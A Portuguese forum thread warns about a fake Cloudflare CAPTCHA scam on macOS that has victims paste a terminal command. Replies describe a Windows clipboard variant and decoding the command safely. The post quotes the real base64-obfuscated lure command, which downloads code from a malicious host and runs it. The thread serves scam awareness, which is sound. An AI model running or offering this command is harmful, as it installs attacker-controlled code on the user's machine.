Executando verificação de segurança...
2
junioroliveira
1 min de leitura ·

⚠️ Golpe usando “verificação Cloudflare” falsa no macOS

Olá, hoje me deparei com um golpe que nunca tinha visto antes, apesar de verificar posteriormente através de algumas pesquisas que ele já vem sendo aplicado há alguns meses.

Ao acessar um site foi carregado uma tela de verificação da CloudFlare, o que me chamou muito a atenção foi a perfeição da página, diferente da maioria das páginas clonadas que já vi com erros de escrita e visual duvidoso, essa sem dúvidas passaria tranquilamente como uma página genuína. (Print da página: https://ibb.co/rR4kVHf8)

A página pedia para que eu fizesse uma verificação para confirmar que não era um bot, a verificação era basicamente copiar um código e colar no terminal do macOS.

Segue abaixo o suposto código de verificação que recebi para que fosse executado no meu terminal.

⚠️ ⚠️ Atenção! Este é um código que faz uma requisição à uma url maliciosa REAL.
Não execute este comando no seu terminal, o intúito da postagem é alertar, reportar a comunidade e estudar o funcionamento do golpe.

echo "Y3VybCAtcyBodHRwczovL2dhbW1hLnNlY3VyZWFwaW1pZGRsZXdhcmUuY29tL3N0cml4L2luZGV4LnBocCB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

Não sei quais informações exatamente podem ser acessadas quando o codigo é executado porém, deixo esse estudo de caso pra vocês, até mais.

Carregando publicação patrocinada...
2
tuboi

Tem momentos na vida q a ignorância salva de certos apertos. Imagino que pra um leigo em computação só iria desesperar e fechar o troço, pois nem saberia como abrir o terminal.

Vlws por alertar.

2
junioroliveira
  • Autor
    Autor

Eu no automático já fui abrindo o terminal, quando pensei, - não espera, isso não é normal. E é ai que a maioria das pessoas caem, quando não conseguem sair do piloto automático a tempo.

1
rlaneth

Já vi uma dessa no Windows. Pior: no meu caso, foi ao acessar um site comum, um blog WordPress legítimo que tinha sido compromerido.

No caso, a página falava pra clicar no botão de verificar o CAPTCHA, e nisso já colocava o código malicioso na área de transferência.

Em seguida, ela falava pra apertar Win + R, Ctrl + V e Enter pra concluir a verificação.

Eu estava igual a você, no piloto automático. Quando a página mandou apertar Win + R, meu cérebro travou, fiquei uns dois segundos olhando, aquela sensação de "peraí, quê?". Felizmente não segui com o comando.

Daí pesquisei no Google e vi que esse golpe aí já é conhecido faz . Bizarro.

1
aureliocasoni

Ao olhar neste echo percebi a presença de == no final da String, deduzi na hora que era um base64. Não tive dúvidas, copiei a string e coloquei em um decoder de base64 (um site, não no terminal).

O meu chute foi certeiro, a string decodificada era (ATENÇÃO: NÃO RODE ESSE COMANDO!)

Comando malicioso decodificado

Que malandro, e põe malandro mesmo. Daqui a pouco vai ter que colocar nos terminais um alerta ao colar um comando, igual ao que acontece no Chrome DevTools.